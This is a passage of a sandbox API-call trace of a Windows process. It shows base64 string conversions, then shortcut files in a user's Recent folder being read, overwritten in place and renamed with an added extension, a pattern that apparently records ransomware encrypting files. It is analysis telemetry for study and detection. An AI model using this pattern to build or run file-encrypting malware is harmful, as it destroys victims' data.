lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.260] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0108.261] GetCurrentThreadId () returned 0x1358 [0108.261] GetCurrentThreadId () returned 0x1358 [0108.261] GetCurrentThreadId () returned 0x1358 [0108.261] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.261] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0108.262] GetCurrentThreadId () returned 0x1358 [0108.262] GetCurrentThreadId () returned 0x1358 [0108.262] GetCurrentThreadId () returned 0x1358 [0108.262] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eiwjZXFfC09j.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\eiwjzxffc09j.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.262] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0108.262] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.262] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3e5 [0108.262] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.262] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3e5, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3e5, lpOverlapped=0x0) returned 1 [0108.263] CloseHandle (hObject=0x3f4) returned 1 [0108.263] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eiwjZXFfC09j.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\eiwjzxffc09j.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.264] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3e5, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3e5, lpOverlapped=0x0) returned 1 [0108.266] CloseHandle (hObject=0x3f4) returned 1 [0108.267] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eiwjZXFfC09j.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\eiwjzxffc09j.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eiwjZXFfC09j.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\eiwjzxffc09j.lnk.mz173801")) returned 1 [0108.267] GetCurrentThreadId () returned 0x1358 [0108.267] GetCurrentThreadId () returned 0x1358 [0108.267] GetCurrentThreadId () returned 0x1358 [0108.268] GetCurrentThreadId () returned 0x1358 [0108.268] GetCurrentThreadId () returned 0x1358 [0108.268] GetCurrentThreadId () returned 0x1358 [0108.268] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75a572e4, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75a572e4, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75a58691, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="EtLEEKM-JP9vt.lnk", cAlternateFileName="ETLEEK~1.LNK")) returned 1 [0108.268] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0108.268] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0108.268] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EtLEEKM-JP9vt.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\etleekm-jp9vt.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75a572e4, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75a572e4, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75a58691, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3b0)) returned 1 [0108.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0108.269] GetCurrentThreadId () returned 0x1358 [0108.269] GetCurrentThreadId () returned 0x1358 [0108.269] GetCurrentThreadId () returned 0x1358 [0108.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0108.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0108.270] GetCurrentThreadId () returned 0x1358 [0108.270] GetCurrentThreadId () returned 0x1358 [0108.270] GetCurrentThreadId () returned 0x1358 [0108.270] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EtLEEKM-JP9vt.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\etleekm-jp9vt.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.270] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0108.270] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.270] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3b0 [0108.270] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0108.270] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3b0, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3b0, lpOverlapped=0x0) returned 1 [0108.271] CloseHandle (hObject=0x3f4) returned 1 [0108.272] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EtLEEKM-JP9vt.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\etleekm-jp9vt.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0108.273] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | 